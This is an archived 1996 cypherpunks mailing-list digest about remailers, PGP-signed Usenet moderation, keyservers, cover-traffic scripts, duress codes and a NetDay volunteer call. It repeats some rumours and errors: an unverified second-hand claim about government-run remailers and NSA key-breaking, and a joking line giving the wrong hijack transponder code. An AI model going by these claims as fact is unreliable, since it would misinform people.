> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Emanuel Barros <eman@netcom.com>
Date: Tue, 5 Mar 1996 13:54:57 +0800
To: cypherpunks@toad.com
Subject: NetDay96 (fwd)
Message-ID: <Pine.3.89.9603032159.A24091-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


I apologize for those that are out of California, but other wise
please consider helping.  This is a very worth while cause.
This will bring us much closer to educating all the children in 
our schools about what's going on on the internet.  TIA

                                             eman@netcom.com

---------- Forwarded message ----------

>On NetDay96,  March 9, 1996, a hundred thousand volunteers in 
>California
>will go to twelve thousand schools in California, and install the same
>Category 5 wire we use in all California business local area networks.
>We will connect five classrooms and the library to a central closet, 
>in
>preparation for connection to the Internet.  This is a barnraising, a
>kickstart for networking in the schools.
>
>Every high tech employee in California should be involved. Every
>contractor for a high tech company should be involved. Anyone --
>employee, customer, or supplier -- that you can think of who believes
>linking our children to the Internet is a good idea should be 
>involved.
>
>What do you do?  Go to www.netday96.com, find a school, and volunteer 
>to
>help put that school on the Internet on March 9.  Go to that school on
>Saturday, March 9, and help ten other people pull wire from five
>classrooms and a library or computer lab to a central closet -- you 
>don't
>need any particular expertise.  That's it. You can choose a school 
>from
>the twelve thousand home pages created on a server at the Well:
>www.netday96.com.  All schools, private or public, are there; if it 
>has
>more than ten children in a classroom, it's a school -- if you don't 
>see
>your school, mail netday@kqed.org  and NetDay will put up a home page 
>for
>you.
>
>As NetDay approaches, you will see pages go up for every company in
>California supporting NetDay, together with the count of participants 
>from
>each company.
>
>We're jumpstarting the schools.  Our goal is to bring every school in
>California past the first barrier to access: interior wiring.  We then
>use the new capability in the schools to persuade the carriers to 
>provide
>Internet access.  And it's working.
>
>We now have commitments from MCI, Netcom, and ATT to provide free 
>dialup
>a ccess to the Internet for every school in California. Higher 
>bandwidth
>will come next.
>
>We've talked the vendors into creating NetDay Kits that they will ship
>directly to the schools. A standard kit, with two to three thousand 
>feet
>of Cat 5 wire, jacks, a 24-way patch panel, connectors, and cable ties
>will cost between $350 and $500.  Pacific Bell is sponsoring 1,000 
>kits.
>Small electrical contractors are sponsoring two or three schools.
>Individual parents are sponsoring schools.  You can. Your district 
>office
>can.  All details are at the NetDay web site: www.netday96.com.
>
>Please sign up now.
>
>Our first need is to show a groundswell of volunteers.  We announced
>NetDay in San Francisco on January 19, at a school wired by Sun and 
>3Com
>employees on Volunteer Day in November. Vice President Gore arrived to
>praise the volunteers, and thank all California high-technology 
>companies
>participating in NetDay.  Volunteering has taken off, but we need to 
>reach
>ten thousand in the next week or two.
>
>Please volunteer today.
>
>This Web site is the first use of the World Wide Web to organize a 
>mass
>volunteer event.  Please help make it a success.
>
>Please mail this request to anyone on your mailing lists. Please ask 
>all
>webmasters to put a pointer to www.netday96.com on their home page.  
>We
>are organizing this in a totally decentralized way, using the Web.  
>This
>is the first time this has been tried, and I believe the Net can do 
>it.
>
>We can do it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Mon, 4 Mar 1996 15:12:02 +0800
To: "'Timothy C. May'" <tcmay@got.net>
Subject: RE: FW: Communications Decency Act (hee-hee)
Message-ID: <01BB094A.D39E08C0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Timothy C. May

This is of course an old idea. Regrettably, the CDA is not based on a
simple bright line test invovling the "Seven [exonized] Words,"
immortalized in the FCC--Carlin--Pacifica case. Rather, "indecent" is
broadly interpreted to mean essentially whatever a prosecutor can convince
a panel of bluenosed citizens is indecent.
....................................................................

Well, if you were prosecuted, you could always explain what it means to kiss your "Gingrich" by pointing to any part of your body you choose.

Of course they would be indicating, by their accusations, that they know enough about indecency to become suspicious over the resemblance....

(such sensitive people)

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 4 Mar 1996 13:50:01 +0800
To: Just Rich <rich@c2.org>
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <Pine.SUN.3.91.960303134642.15462A-100000@infinity.c2.org>
Message-ID: <sRy9JD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Just Rich <rich@c2.org> writes:
> comp.os.ms-windows.announce will also start using PGPMoose when I get
> around to it, probably today.

All moderated newsgroups should use it.

However the robomoderator that Igor Chudov wrote uses digital signatures to
authenticate _posters as follows: there's a "white list" (as opposed to "black
list") of trusted posters whose submissions will be approved and posted
automatically, without going through any moderator. A person on the "white
list" can request that the robomod check his signature and not post it if the
submission may be a forged e-mail. I strongly urged Igor to make digital
signatures mandatory for "white list" membership, but he argued that a lot of
likely posters lack the brains to use PGP. The robomod will look at things like
"Received" lines in the e-mailed submission to try and detect forgeries.

While at it, here's a pre-filled ballot. Just add your name and e-mail it
to russian-vote@netagw.com.

===== BEGINNING OF BALLOT: Delete everything BEFORE this line =====
-------------------------------------------------------------------
soc.culture.russian.moderated Ballot
<SCRM-0001> (Do not remove this marker!)
-------------------------------------------------------------------
Please provide your real name, or your vote may be rejected.  Place
ONLY your name (ie. do NOT include your e-mail address or any other
information; ONLY your name) on the next line beside "Voter name:".
Voter name:
-------------------------------------------------------------------
Insert YES, NO, ABSTAIN, or CANCEL inside the brackets for each
newsgroup listed below (do not delete the newsgroup name):

 Your Vote   Newsgroup
 ---------   ---------
[ YES     ]  soc.culture.russian.moderated (moderated)
-------------------------------------------------------------------
===== END OF BALLOT: Delete everything AFTER this line ============

Vote YES to see how a robomoderator that uses PGP works out.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Mon, 4 Mar 1996 15:58:06 +0800
To: Just Rich <rich@c2.org>
Subject: Re: Remailers run by spooks
In-Reply-To: <199603040511.AAA24235@bb.hks.net>
Message-ID: <199603040655.WAA18580@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Just Rich <rich@c2.org>]
[cc: cypherpunks@toad.com]
[Subject: Re: Remailers run by spooks ]
[In-reply-to: Your message of Mon, 04 Mar 96 00:11:09 EST.]
             <199603040511.AAA24235@bb.hks.net> 

>However, I also have no doubt that Strassmann and Marlow are spreading
>disinformation and exaggerating their capabilities in an attempt to break
>the web of trust and incite a witch hunt. It won't work. The answer in any
>case is more use of remailers, not less. Just turn up the noise level. 
>You already know that nothing is 100% secure, but you do what you can. 
>It's a war of attrition.

I agree with turning up the noise level. For a few weeks now I've been
using the following script:

	#!/bin/ksh
	while sleep `roll 1 7 1`000
	do
	    roll 1 10000 `roll 1 200 1` | "a chain of remailers back to me"
	done

I've deleted the actual command to do the remailing, since it is
homegrown. Back at this end, I recognise the incoming mail and throw it
away. So I never get to see it, but there is a steady stream of
encrypted traffic both in and out.

The "roll" command, by the way, is a perl script I picked up off the
net, and it is very handy to have around:

	#!/usr/bin/perl
	$low = $ARGV[0];
	$high = $ARGV[1];
	$count = $ARGV[2];
	$high = $high - $low + 1;

	# seed the random process, and generate a few to be thrown away.
	srand($$+time);
	for ($i = rand(1000)/50; $i >= 0; --$i) {
	    rand(1000);
	}

	# generate
	for ($i = 0; $i < $count; ++$i) {
		$v = int(rand($high)) + $low;
		print $v, "\n";
	}

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMTqKi4HskC9sh/+lAQGZigQAjOcE1xU08shVqA/8wdnworQVKr9nHSCh
xZEa5N6pBnV6rxvLJYC8QZMkYj/OcUzyZDUg10unqBLDjtgChSBhG61F/V5RWNOc
X4IuTJAt1sIxplT6UU3OvLo7AaaNdSgz886X/M4ssnlIubOo7b+jNlxccMLr7PKK
FYuLndXjspg=
=knru
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Mar 1996 07:57:54 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <kgT9JD16w165w@bwalk.dm.com>
Message-ID: <199603040500.XAA06840@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Cc: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet

Dr. Dimitri Vulis wrote:
> Bruce Baugh <bruce@aracnet.com> writes:
> > I'm surprised nobody has brought this up before....
> >                      FIRST CALL FOR VOTES (of 2)
> >             moderated group soc.culture.russian.moderated
> >
> > <snip>
> >
> > 6. Individuals in the database of known readers may post freely to
> > the group, subject to the conditions in sections 1-4 above.  If need
> > arises, the robomoderator may perform PGP verification of the
> > identity of the known reader and, if the reader requests so,
> > automatically reject all the submissions from the reader without
> > a valid PGP signature.
> 
> Igor Chudov, who coded the robomoderator, reads Cypherpunks, and
> is known to appreciate and use good suggestions.

Indeed. If you indicate your interest, I can post here a more or less
full description of the robomoderator, how it implements secure
exchange between itself and human moderators, verifies submissions,
and signs approved articles for posting (it uses PMApp by Greg Rose).

Your criticisms will be most welcome.

> One issue that hasn't been addressed by the s.c.r.m robomod is the
> possibility of persistent nyms: that is, Alice D. Nonymous somehow makes
> her public key known to the robomod; and later if someone submits an article
> via some anon remailer claiming to be hers, it would be rejected if the
> signature doesn't check. Of course, her true submissions would be accepted
> from any remailer. How could such protocol be implemented?

We see no problem with user posting under pseudonyms, as long as they do
not try to pretend to be other real people and do not constantly mutate,
and submit their messages to the robomoderator for consideration.

> (Of course, some people have what they believe to be valid reasons not
> to use PGP.)

Sorry if this question will provoke a mini flamewar, but what are
such reasons?

	- Igor.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTp458JFmFyXKPzRAQEbQAP8CAtCiNm9h7pijz4+qrm6FFGRBDjsqvZb
RkgFetA01oEONdp+RW3NP6GBY1zeNg7+HahfoavNPhASwBl230hLni1fEW5pL75o
J5v5yNCYT4/N1aVfchoo50kjXv+KqvRyjr5YNxVmd/IFKokSV1w9ASfdXVk/7uDB
Ep1n1jmP4OQ=
=EQOd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 5 Mar 1996 13:29:44 +0800
To: cypherpunks@toad.com
Subject: Re: A brief comparison of email encryption protocols
Message-ID: <199603040715.XAA13853@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:03 AM 3/1/96 -0800, Eric Murray <ericm@lne.com> wrote:
>Suggestions?  maybe key:/pgp/slack.lne.com/ericm/key/asc?

>Finally, a question:  should the keyserver be able to serve
>keys in a way that is secure from a MITM attack, or can it depend
>on the certificate chain in the key certificate itself to
>validate the key certificate?  I think it can, but I am not
>sure, so perhaps someone smarter than I can explain why, or why not.

Web of trust is clearly the way to go, but it helps to have both.
1) You need Web of Trust anyway
2) You may have multiple signatures, by people other than the keyserver;
        issues like "Company X Authorizes Key NNN for purchase up to $D"
        are outside the scope of keyservers.
3) If the keyserver managers _want_ to sign the key, they can.
4) It's much more convenient to run a non-trusted keyserver;
        there's a lot less security paranoia required,
        and enough less work that more people will run them.

On the other hand, sending signed responses from the keyserver 
is clearly valuable.  The big MITM risk is for revoked keys;
the MITM may be able to block transmission of the revocation
notice or, for Certificate Revocation List models like X.509, the CRL,
and send an old key.  Having the MITM sign and timestamp the response
reduces the risk that an old self-revoked key will get through.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 5 Mar 1996 10:27:40 +0800
To: Deranged Mutant <WlkngOwl@UNiX.asb.com>
Subject: Re: (Fwd) White House mail bomb protest?
In-Reply-To: <199603040145.UAA04626@UNiX.asb.com>
Message-ID: <Pine.SUN.3.91.960303231445.23464E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Deranged Mutant wrote:

> In regards to the few messages about mailbombing the prez's box...
>  Folks:
> 
>  Good day.  By way of introduction, I'm the consultant who  did the
>  "anti-mailstorm/anti-mailbomb" software that runs on the MX host for
>  WHITEHOUSE.GOV.  Now that the Telecom. Act of 1996 has been signed,
>  the volume of mail through WHITEHOUSE.GOV has gone up significantly.
>  For example, there were about 85,000 lines in the mail log file yesterday.

[...]

>  Without going into details, if too many messages come from a single site,
>  the mail handler will throttle back accepting messages.

Not only did he go into details, he gave away the show.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olcay Cirit <olcay@libtech.com>
Date: Mon, 4 Mar 1996 13:00:52 +0800
To: cypherpunks@toad.com
Subject: Request Comments: Transpose/XOR Hash
Message-ID: <199603040416.XAA23922@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi!

I'm working on a cipher that utilizes Cipher Block Chaining
and One-way hashing to create a sequence of pseudo-random
numbers to XOR against a plaintext.

I'd like to know if anyone has comments regarding the hash
method I came up with. It is a combination of Transposition
and XORing. Basically, it works like this:

Let's say K is the 8 character key that will be hashed. 
There are two binary accumulators M and L, which store the
Most and Least significant bits in each byte of K. After M and
L are both 8 bits long, they are XORed together and the 
resulting value replaces byte N in the Key. This is repeated
8 times, and each time, N is incremented by one.

	Any thoughts, comments?

		-olcay

- --
"For he who lives more lives than one, |) Olcay Cirit -- olcay@libtech.com
   more deaths than one must die"      (| http://www.libtech.com/olo2.html

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTpumyoZzwIn1bdtAQHnqAGA2CzuLVpiPdRQ84MuC8aBxy7vcIZsujLr
85hGcVoknfAujjXFoy7KOxGQrZt3RorK
=jQ7w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 4 Mar 1996 15:06:30 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199603040440.FAA28574@utopia.hacktic.nl>
Message-ID: <199603040533.XAA07799@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


There's an obvious solution to this problem.  Run a public remailer, and 
route your traffic through your own site. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 5 Mar 1996 07:41:45 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) White House mail bomb protest?
In-Reply-To: <Pine.SUN.3.91.960303231445.23464E-100000@polaris.mindport.net>
Message-ID: <HB39JD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>  Good day.  By way of introduction, I'm the consultant who  did the
>  "anti-mailstorm/anti-mailbomb" software that runs on the MX host for
>  WHITEHOUSE.GOV. ...

I used to correspond with JMS a while back.  He's a cool dude.  Funny that
he'd be doing something for Klinton now.

I'm sure that if JMS put up a piece of software, it's hard to circumvent.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 Mar 1996 13:31:56 +0800
To: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <sRy9JD21w165w@bwalk.dm.com>
Message-ID: <199603040605.AAA07118@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet

Dr. Dimitri Vulis wrote:
> 
> Just Rich <rich@c2.org> writes:
> > comp.os.ms-windows.announce will also start using PGPMoose when I get
> > around to it, probably today.
> 
> All moderated newsgroups should use it.
> 
> However the robomoderator that Igor Chudov wrote uses digital signatures to
> authenticate _posters as follows: there's a "white list" (as opposed to "black
> list") of trusted posters whose submissions will be approved and posted
> automatically, without going through any moderator. A person on the "white
> list" can request that the robomod check his signature and not post it if the
> submission may be a forged e-mail. I strongly urged Igor to make digital
> signatures mandatory for "white list" membership, but he argued that a lot of
> likely posters lack the brains to use PGP. The robomod will look at things like
> "Received" lines in the e-mailed submission to try and detect forgeries.

This is not exactly correct. The check for white list will be there
exactly as you specified. It will have a toggle switch, so that we
can turn it on and off, depending on how badly we are hit with
forgeries.

> 
> While at it, here's a pre-filled ballot. Just add your name and e-mail it
> to russian-vote@netagw.com.
> 

Please do NOT use this pre-filled ballot to vote (although of course
I would be pleased with cypherpunks helping to let such an experiment
go). According to voting rules, you have to vote only in response to the
full CFV posted to news.groups. If you do not have access to news or
your news system expired the CFV already, you can retrieve the CFV
(containing the rationale, charter and the ballot) by sending email to
russian-cfv-request@netagw.com. Body of your message will be ignored.

All votes that use pre-filled ballots are invalid.

	- Igor.

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTqH5cJFmFyXKPzRAQGYVQQAktT4DYcIcDCV9CSWK+BYGPGS9S609m59
whde9eCtG7d6XRUdnAlZnJQ/sqr/TXVtpfTfGYTZJnD0HYOO0INq7+jN7qHs/7ue
KKQMAHM0mi9njEsKUP1cFvn+h68UNDSlH9zrjuMgLZvPxHcal+Wg0gAT9MBsO3xs
4HG2DcpBTSo=
=JUnd
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTqIK8JFmFyXKPzRAQFRFwQAk7/feGthnWXKKJIH8m4XTRbfW0wT1dmI
GazD0DSLU2Yy/L31QeIA2wdXqxHRIv15SXqv4/rdRnpbbRnxEmIO3jzZmRjvjWTK
+wXO/kDrlmiiO+QCmg6jQs8BD4Mk4wNkqwsgUhxLnX9z6nwRA3KUqpOMp8Y45HRT
aFyQV5SYByg=
=cTQ0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Tue, 5 Mar 1996 07:57:39 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers run by spooks
Message-ID: <199603040511.AAA24235@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Mar 1996, Anonymous (or so he thinks!) wrote:

> >Both presenters explicitly acknowledged that a number of anonymous
> >remnailers in the US are run by government agencies scanning traffic.
> >Marlow said that the government runs at least a dozen remailers and that
> >the most popular remailers in France and Germany are run by the
> >respective government agencies in these countries. In addition they
> >mentioned that the NSA has successfully developed systems to break
> >encrypted messages below 1000 bit of key length and strongly suggested
> >to use at least 1024 bit keys. They said that they semselves use 1024
> >bit keys.
> 
>      I don't know about everyone else, but I consider this, if true, to be a 
> MAJOR worry.  It never ceases to amaze me how lightly the government takes 
> lying to the people.  Unfortunately I don't have the contacts or resources 
> to do any further investigation, I hope this thread is resolved one way or 
> another soon.

Yeah, didn't you know that Sameer was on the CIA payroll? How do you 
think he paid for his new Ferrari?

I have no doubt that the CIA can break 1000-bit keys on a case-by-case
basis, *if they decide to allocate the resources*. I think it's possible
that some remailers are run by spooks. However, I seriously doubt that
anyone is breaking stuff routinely, and I think the web of trust is pretty
good. Of course, the CIA had Ames... the reverse could easily be true. 

However, I also have no doubt that Strassmann and Marlow are spreading
disinformation and exaggerating their capabilities in an attempt to break
the web of trust and incite a witch hunt. It won't work. The answer in any
case is more use of remailers, not less. Just turn up the noise level. 
You already know that nothing is 100% secure, but you do what you can. 
It's a war of attrition.

- -rich
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTp7ayoZzwIn1bdtAQFJXgGAg8I4+IwZYrDI46bMj2nED+Dh0AeoMJVs
PP10Ui5u46sXDAUjpMzJSwv5EqdIOEKy
=611k
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usenet@gate.overcom.com
Date: Mon, 4 Mar 1996 11:42:48 +0800
To: cypherpunks@toad.com
Subject: blah
Message-ID: <4hdcko$1f8@gate.overcom.com>
MIME-Version: 1.0
Content-Type: text/plain


sdfjhs
sdjhsfj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 5 Mar 1996 13:28:38 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers run by spooks
Message-ID: <v02120d02ad6031aae9c6@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:11 AM 3/4/96, Just Rich wrote:

>However, I also have no doubt that Strassmann and Marlow are spreading
>disinformation and exaggerating their capabilities in an attempt to break
>the web of trust and incite a witch hunt. It won't work. The answer in any
>case is more use of remailers, not less. Just turn up the noise level.
>You already know that nothing is 100% secure, but you do what you can.
>It's a war of attrition.

        Only the shadow and a few bureaucrats know whether spooks have
infiltrated the remailer operators' web of trust. I'd imagine the payoff in
suggesting the possibility would lie in breeding mistrust not among
operators but, rather, among potential users: diminishing the use and
propagation of remailers would lower the overall noise level, making
case-by-case interception and cracking that much more manageable. But this
hall-of-mirrors speculation is really just misguided FUD: improving
protocols, more remailers, and expanding webs of trust are the prize to
keep our eyes on.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 5 Mar 1996 13:08:28 +0800
To: cypherpunks@toad.com
Subject: Re: Mainstreaming PGP on Usenet
In-Reply-To: <199603040500.XAA06840@manifold.algebra.com>
Message-ID: <3JJakD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Dr. Dimitri Vulis wrote:
...
> > One issue that hasn't been addressed by the s.c.r.m robomod is the
> > possibility of persistent nyms: that is, Alice D. Nonymous somehow makes
> > her public key known to the robomod; and later if someone submits an articl
> > via some anon remailer claiming to be hers, it would be rejected if the
> > signature doesn't check. Of course, her true submissions would be accepted
> > from any remailer. How could such protocol be implemented?
>
> We see no problem with user posting under pseudonyms, as long as they do
> not try to pretend to be other real people and do not constantly mutate,
> and submit their messages to the robomoderator for consideration.

On the contrary, I was thinking of a situation when a person is posting through
an anonymous remailer, yet wishes to establish a persistent nym that can't be
impersonated. E.g., someone may submit articles via remailers (different every
time) and have a signature 'Alice D. N.'; what's to prevent someone else from
submitting an article and also signing it 'Alice D. N.'?

I was thinking of allowing the user to add a 'From: <nym>' in the first
paragraph of the PGP-signed block. To establish the nym, Alice would first
post her public key under the name of Alice; then she would post things like

From: remailer@somewhere

-- begin pgp signed msg

From: Alice

...

This would also address the problem of someone's misconfigured system where
his submissions appear to come from moron@camelot.ptu.edu or
moron@pendragon.ptu.edu or some other random hostname.

P.S. So, when are you setting up your own mixmaster remailer, Igor? :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Mar 1996 15:55:12 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: Looking for code to run an encrypted mailing list
In-Reply-To: <2.2.32.19960304053309.00bd5ec8@mail.software.net>
Message-ID: <Pine.SUN.3.91.960304012046.23464K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, John Pettitt wrote:

> I'd like to run an encrypted mailing list  - the model I'm linking of is this ..
> 
> Poster cryptes mail with pgp using list exploder key. List exploder decrypts
> mail and recrypts with keys for all current list members and then sends the
> mail.
> 
> [I don't want all the list members to need to know every other list members
> public key]
> 
> Before I lanch into hacking majordomo - has anybody done this already or
> somthing like it ?

Someone asked this a little while ago.  I don't recall if there was an 
answer.  I hope so, I'd be interested too.


> 
> John
> --
> John Pettitt
> email:         jpettitt@well.sf.ca.us (home)
>                jpp@software.net       (work)    
> 
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Mar 1996 15:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: Duress
In-Reply-To: <199603040535.VAA25193@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960304044741.4023B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Black Unicorn wrote:

> On Sun, 3 Mar 1996, Bill Frantz wrote:
> 
> > >Of course, all smart air piracy buffs know the transponder code is 7600, 
> > >and refuse to allow the pilots to use it.
> > 
> > It changes from time to time.  Of course subscribing to an IFR chart
> > service will keep you up-to-date with the changes.
> 
> You should forward this to the list.
> 
> > 
> > Regards - Bill
> > 
> > 
> > ------------------------------------------------------------------------
> > Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> > (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> > frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA

Woah!  Did I inadvertantly copy this to the list?  It should have only 
gone to Mr. Frantz.

My most sincere apologies!

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Mon, 4 Mar 1996 22:51:24 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Duress
In-Reply-To: <199603032311.PAA16326@netcom7.netcom.com>
Message-ID: <199603041403.GAA10958@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At  2:49 PM 3/3/96 -0500, Dr. Dimitri Vulis wrote:
> 
> >As a side remark, every burglar alarm connected to a phone that I've ever seen
> >has this feature: a code that one can type under duress that will both turn
> >off the alarm and call for help. I wonder how many users will remember this
> >code when under duress.
> 
> The air-transport system has had a Hijack transponder code for years.  The
> pilot dials it into the air traffic system radar transponder when the plane
> is hijacked.  However there is a problem.
> 
> One of the private pilot magazines reported that a small plane operator
> used the code (because his airplane was, in fact, being hijacked).  When he
> landed the airplane, it was surrounded by LEA, and in the ensuing gun
> battle, everyone on the airplane died.  The went on to say that the safety
> of the passengers and airplane are the pilot's primary responsibility and
> that pilots should consider this incident when deciding to use the code.

Sorry, but what's LEA stand for?

> Duress codes need to be designed to minimized the chance of such responses
> when they are used.
> 
> Regards - Bill
> 
> 
> ------------------------------------------------------------------------
> Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
> (408)356-8506     | lost jobs and  | 16345 Englewood Ave.
> frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA
> 
> 
> 


-- 
Have you ever taken pride in and cultivated a wrongness?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
Date: Tue, 5 Mar 1996 00:14:18 +0800
To: cypherpunks@toad.com
Subject: None
Message-ID: <199603041230.GAA23615@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Black" == Black Unicorn <unicorn@schloss.li> writes:


    Black> On Sun, 3 Mar 1996, John Pettitt wrote:
    >> I'd like to run an encrypted mailing list - the model I'm
    >> linking of is this ..
    >> 
    >> Poster cryptes mail with pgp using list exploder key. List
    >> exploder decrypts mail and recrypts with keys for all current
    >> list members and then sends the mail.
    >> 
    >> [I don't want all the list members to need to know every other
    >> list members public key]
    >> 
    >> Before I lanch into hacking majordomo - has anybody done this
    >> already or somthing like it ?

    Black> Someone asked this a little while ago.  I don't recall if
    Black> there was an answer.  I hope so, I'd be interested too.

	Check out the Web Page at www.alias.net. There is an entry on
PGPdomo.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 5 Mar 1996 01:26:49 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199603041450.GAA07669@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
